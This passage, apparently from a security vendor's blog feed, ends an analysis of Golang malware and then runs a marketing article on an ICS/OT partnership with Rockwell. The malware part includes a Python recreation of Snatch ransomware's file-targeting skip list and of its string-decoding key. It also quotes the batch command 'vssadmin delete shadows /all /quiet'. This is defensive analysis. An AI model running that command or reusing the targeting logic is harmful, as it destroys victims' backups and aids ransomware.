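    parts = path.lower().replace("\\", "/").split("/")
    return any(part in EXCLUDED_DIRS for part in parts)

print(is_excluded(r"C:\Program Files\App\config.ini"))    # -> True (skipped)
print(is_excluded(r"C:\Users\victim\Documents\q3.xlsx"))  # -> False (encrypted)
```

Skip lists like this keep the operating system bootable, so the victim can still read the ransom note and pay.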

As seen in Figure 6, Snatch ransomware starts by initializing the main structures necessary for Golang malware execution and then uses the main_decodeString function to recover encrypted strings: each is Base64-decoded and then XOR-decrypted using the key “mjkHreiUxqcTSyhWnbDXYuE.”
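The decoding scheme described, Base64 followed by repeating-key XOR with "mjkHreiUxqcTSyhWnbDXYuE", can be reproduced in a few lines. Only the key comes from the sample; the helper names and the round-trip plaintext below are our own.

```python
import base64
from itertools import cycle

KEY = b"mjkHreiUxqcTSyhWnbDXYuE"  # XOR key recovered from the Snatch sample

def xor_bytes(data: bytes, key: bytes = KEY) -> bytes:
    """XOR data against a repeating key (symmetric: encode == decode)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def decode_string(blob: str) -> str:
    """Mirror of the decoding path: Base64-decode, then XOR-decrypt."""
    return xor_bytes(base64.b64decode(blob)).decode()

# Round trip: build an encoded blob the way the sample's strings are stored,
# then recover it with decode_string.
encoded = base64.b64encode(xor_bytes(b"HOW TO RESTORE YOUR FILES.TXT")).decode()
print(decode_string(encoded))  # -> HOW TO RESTORE YOUR FILES.TXT
```

Analysts can run the same helper over every encoded string in the binary to bulk-decrypt its configuration and messages.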

Figure 6. Snatch ransomware main_init functions

The main_makeBatFile function creates a .bat file, named via main_randomBatFileName, containing the commands “SC QUERY | FINDSTR SERVICE_NAME” and “vssadmin delete shadows /all /quiet”. In this case, it creates a file named nceirbfjdgljlw.bat.

In terms of persistence, Snatch ransomware uses the main_runService function to run as a service via the Golang svc package. Finally, the main_encrypt function triggers the encryption process, at the end of which it places a ransom note in every encrypted folder on the victim’s system.

The ransom note provides two email addresses for contacting the ransomware operator to negotiate the ransom demand and potentially recover the encryption key.

Figure 7. Ransom note for Snatch ransomware (Click to enlarge)

The Falcon platform detects and protects against this type of Golang-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and IOAs to detect the threat. As the screenshot below illustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.

Figure 8. CrowdStrike Falcon using machine learning for detecting and preventing Snatch ransomware (Click to enlarge)

Note: More detailed intelligence and technical information about Snatch ransomware is available to CrowdStrike customers through the Falcon console.

Golang Is Here to Stay

Golang-written malware is not a fad and will not go away anytime soon. If anything, we are seeing an increase in Golang use by malware developers and adversaries, likely in step with the language’s broader adoption by the general programming community as its features and capabilities have matured.

Golang has proven to be a sufficiently versatile programming language that can accommodate any malware, although coin miners currently seem to pique the interest of developers. 

CrowdStrike will continue to monitor the evolution of the malware threat landscape and use the power of machine learning and IOAs to detect and protect endpoints from new and unknown malware. 

Indicators of Compromise (IOCs)

File SHA256
AnarchyGrabber 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e
Coin Miner 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6
Snatch Ransomware e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354
Runtime.dll 5b3fc771f43d8e67bd8957f7b3d9a49eae80b88e43c13cbf16623623e9028375
Inj.exe cc432ca276209849b1e4e36553d12aa87fd4cf1ba2609032986bf82943994774
Procdump.exe c073d88d4240fbd6b7183b126eb0f3617bad8944d7cf924982e2b814170a614f

Additional Resources

✇ CrowdStrike

The ICS/OT Landscape: How CrowdStrike Supports Through Partnerships With Rockwell and Others

By: David Hatchell

CrowdStrike and Rockwell Automation have announced a partnership to help joint customers secure the expanded threat surface of the industrial control systems (ICS) and operational technology (OT) that control our energy infrastructure, manufacture our goods and operate our medical equipment. This has been a greenfield area for security due to the real-time nature of these systems and the need for continuous availability.

The Problem 

Today, the need for extending security controls in the ICS/OT area is most evident in the manufacturing sector, based on the intersection of the threat landscape and the digital transformation of the business. According to the CrowdStrike 2021 Threat Hunting Report, CrowdStrike Intelligence found that the manufacturing sector was the second most targeted industry by ransomware attacks from July 2020 to June 2021. This unique vertical is being targeted by both state-sponsored and eCrime actors. 

While destructive ICS/OT operations originating from select targeted intrusion adversaries are not likely to be aimed at manufacturing sector entities, these environments may be targeted in economic espionage campaigns that seek data repositories or other confidential business information, which can impact operational facilities. CrowdStrike Intelligence has identified several ransomware families used by eCrime adversaries that are capable of terminating OT processes on Windows systems, as evidenced by Ekans ransomware. 

Compounding the threat landscape is the digital transformation of the factory through the promise of the Industrial Internet of Things (IIoT), bringing connected machines, cloud computing and edge-driven analytics to enhance the performance of industrial processes. The shift toward these services has driven a change from a heterogeneous environment of disconnected, proprietary embedded systems and protocols to a homogeneous landscape of cloud platforms, modern operating systems and unified architectures.

Control system defenses can no longer hide behind the traditional air gap, or behind the security-by-obscurity once afforded by the large number of heterogeneous control system protocols and systems unique to each manufacturer. The combination of a homogeneous attack surface, adversary targeting and an increased understanding of these systems has driven the need for comprehensive protection of these areas.

The challenge for CISOs and CIOs is to architect a comprehensive, sustainable security program to bring visibility, detection, protection and response to their plant environments in response to board-level initiatives to secure the factory and enable the workforce. Many of the challenges have been in building the proper governance, with the proper alignment between the plant and security teams to ensure security aligns with the availability and uptime requirements of the plant teams. On the technology side, most of the effort in the past few years has been focused around ICS-specific visibility in the plant environment, enumerating human-machine interface (HMI) and programmable logic controller (PLC) asset identification, vulnerability management and threat intelligence through network solutions designed to understand the heterogeneous automation networks and their requisite proprietary protocols.           

Organizations have traditionally been hesitant to introduce endpoint technology into an OT security program. The conventional wisdom has been that endpoint technology will interfere with plant systems, impacting availability or visibility into plant operations. As a result, plant teams have demanded that their endpoint security technology be certified to interoperate with their automation equipment.

This has led automation manufacturers into years of testing legacy endpoint security products, incurring significant cost to validate every engine and update file and often having to exclude the process directory from scanning altogether because of system conflicts caused by the AV technology hooking into and scanning those files. Other methods, such as application allowlisting, have been used to harden these systems, but they have proven of limited value against current attacks such as Mimikatz, which uses PowerShell scripts to harvest credentials for lateral movement to domain controllers or other endpoints.

The CrowdStrike Solution

CrowdStrike delivers the visibility and protection that organizations need to secure OT environments. The CrowdStrike Falcon® platform leverages real-time threat intelligence on evolving adversary tradecraft, indicators of attack and enriched telemetry from across the enterprise to deliver deep visibility, hyper-accurate detections and automated protection.

The platform’s cloud-native architecture and lightweight agent were purpose-built to scale across enterprise environments — delivering unprecedented efficacy against a wide variety of threats without impacting user or system performance. 

As a result, customers can deploy basic endpoint detection and response (EDR) in a matter of minutes and stream important events, such as network connections, registry information and system properties, directly to the cloud for retention and analysis. Unique attacks are analyzed by machine learning and our threat intelligence team to aid remediation. Falcon is designed as an extensible solution, ensuring new security countermeasures can be added to the platform seamlessly. The Falcon agent requires minimal inbound connectivity, and deployments can support a full Purdue model, with agents at Level 2/3 or 3.5 connecting through a proxied environment.
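To make the telemetry flow concrete, the kind of event record an EDR agent streams to the cloud can be sketched as below. The schema, field names and values are purely illustrative assumptions, not the actual CrowdStrike Falcon sensor event format:

```python
import json
from datetime import datetime, timezone

def make_event(event_type, host, details):
    """Build a hypothetical EDR telemetry record for cloud streaming.

    The field names here are illustrative only; they do not reflect
    the real Falcon sensor wire format.
    """
    return {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "event_type": event_type,  # e.g. network_connection, registry_write
        "host": host,
        "details": details,
    }

# Example: a network connection observed on a (hypothetical) engineering workstation
event = make_event(
    "network_connection",
    host="ENG-WS-01",
    details={"remote_ip": "10.20.30.40", "remote_port": 443, "process": "hmi.exe"},
)
payload = json.dumps(event)  # serialized for streaming to the cloud
```

The point of the sketch is that events are small, structured records, which is why they can be streamed continuously without burdening the endpoint.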

This gives our customers the ability to move quickly beyond basic visibility to real-time detection, protection and automated response. The technology can be deployed without impact to the HMIs and engineering workstations in the plant. An automation vendor no longer has to go through the painful process of endless validation, and plant teams can rapidly deploy, with no impact to production, to protect the "crown jewels": the key systems that operate their plants. The result is the ability to safely detect, protect against and respond to attacks targeting the homogeneous attack surface of modern industrial facilities.


We are excited to work with Rockwell to address the challenges in manufacturing as well as the other key verticals Rockwell supports. Rockwell has used CrowdStrike since 2020 as its corporate standard to test its products at the time of release. The expanded partnership couples CrowdStrike products and services with Rockwell's industrial security services, giving customers the full breadth of protection needed by both security teams and the operational teams responsible for 24/7 plant availability.

This is part of a continued effort by CrowdStrike to work with manufacturers as they build out security products and services for their critical environments. We recently announced a partnership with Nihon Kohden, a global leader in precision medical products and services, which has validated and certified CrowdStrike and is providing a service to its customers to meet the needs of the healthcare industry.

Furthermore, we have built partnerships with several providers that Rockwell partners with to extend the use cases of the Falcon platform to allow customers to drive additional value from their CrowdStrike investment.

Dragos offers a unique CrowdStrike Store application that matches CrowdStrike endpoint telemetry against WorldView ICS-specific threat intelligence, allowing CrowdStrike customers to hunt for ICS-specific indicators of attack. The combination of IT and OT threat intelligence lets end users effectively threat hunt in their environments against both eCrime and state-sponsored attackers, who have demonstrated a sophisticated understanding of the unique nature of industrial environments.
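Conceptually, this kind of hunting is a join between observed endpoint events and an indicator feed. The sketch below is a hypothetical illustration of that pattern; it does not use the actual Dragos WorldView or CrowdStrike Store APIs, and all indicator values and field names are invented:

```python
# Hypothetical ICS indicator feed, as an intel source might supply it
indicators = {
    "hashes": {"deadbeefdeadbeef"},                    # fake file hash
    "domains": {"malicious-ot-c2.example.com"},        # fake C2 domain
}

def hunt(events, indicators):
    """Return events whose file hash or contacted domain matches an indicator."""
    hits = []
    for ev in events:
        if (ev.get("sha256") in indicators["hashes"]
                or ev.get("domain") in indicators["domains"]):
            hits.append(ev)
    return hits

# Hypothetical telemetry from two plant endpoints
telemetry = [
    {"host": "HMI-07", "sha256": "aaaa", "domain": "update.vendor.example"},
    {"host": "ENG-WS-01", "sha256": "bbbb", "domain": "malicious-ot-c2.example.com"},
]
matches = hunt(telemetry, indicators)  # only the ENG-WS-01 event matches
```

Real implementations query retained telemetry at scale rather than iterating in memory, but the matching logic is the same idea.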

Claroty can push its unique intelligence and signatures from plant networks into the CrowdStrike Falcon platform for consumption. It leverages the Falcon agents deployed on HMIs and engineering workstations to pull unique asset properties into its platform, along with the automation manufacturers' vendor-specific project files that enumerate PLC and I/O card information. This provides differentiated visibility without resorting to active querying of the devices themselves, which could impact availability. It is an important use case that can further help our customers on their journey to secure their plants, moving from visibility to detection, protection and response in their plant environments. Claroty is also participating in CrowdStrike's XDR alliance, which brings in Claroty's network intelligence through an open framework.
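The passive-enrichment pattern described here — deriving asset properties from data the agent already sees, rather than sending queries to the PLC — can be sketched as a simple inventory merge. All field names and structures below are hypothetical:

```python
def enrich_inventory(inventory, agent_observations):
    """Merge passively observed properties into an asset inventory.

    agent_observations holds properties learned from data already on the
    engineering workstation (e.g. parsed project files), so no query is
    ever sent to the PLC itself.
    """
    for asset_id, props in agent_observations.items():
        inventory.setdefault(asset_id, {}).update(props)
    return inventory

# Hypothetical starting inventory and passively observed properties
inventory = {"plc-01": {"ip": "10.0.5.10"}}
observed = {"plc-01": {"model": "ExamplePLC-5000", "io_cards": ["DI-16", "DO-8"]}}
inventory = enrich_inventory(inventory, observed)
# plc-01 now carries model and I/O card details learned without active querying
```

The design choice worth noting is that enrichment only ever adds or updates properties; the device is never put at availability risk by an active probe.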

Partnering for Success in ICS and OT Environments

We are excited about our expanding partnerships, which bring together our unique experience and solutions to help joint customers secure the growing attack surface of ICS and OT environments against a continuously evolving threat landscape. The Falcon platform offers real-time protection and visibility across operational facilities, preventing attacks on endpoints on or off the network. By partnering with Rockwell and other strategic partners in manufacturing and other verticals, we are creating best-of-breed solutions that meet the stringent demands of the industrial IoT space.

Additional Resources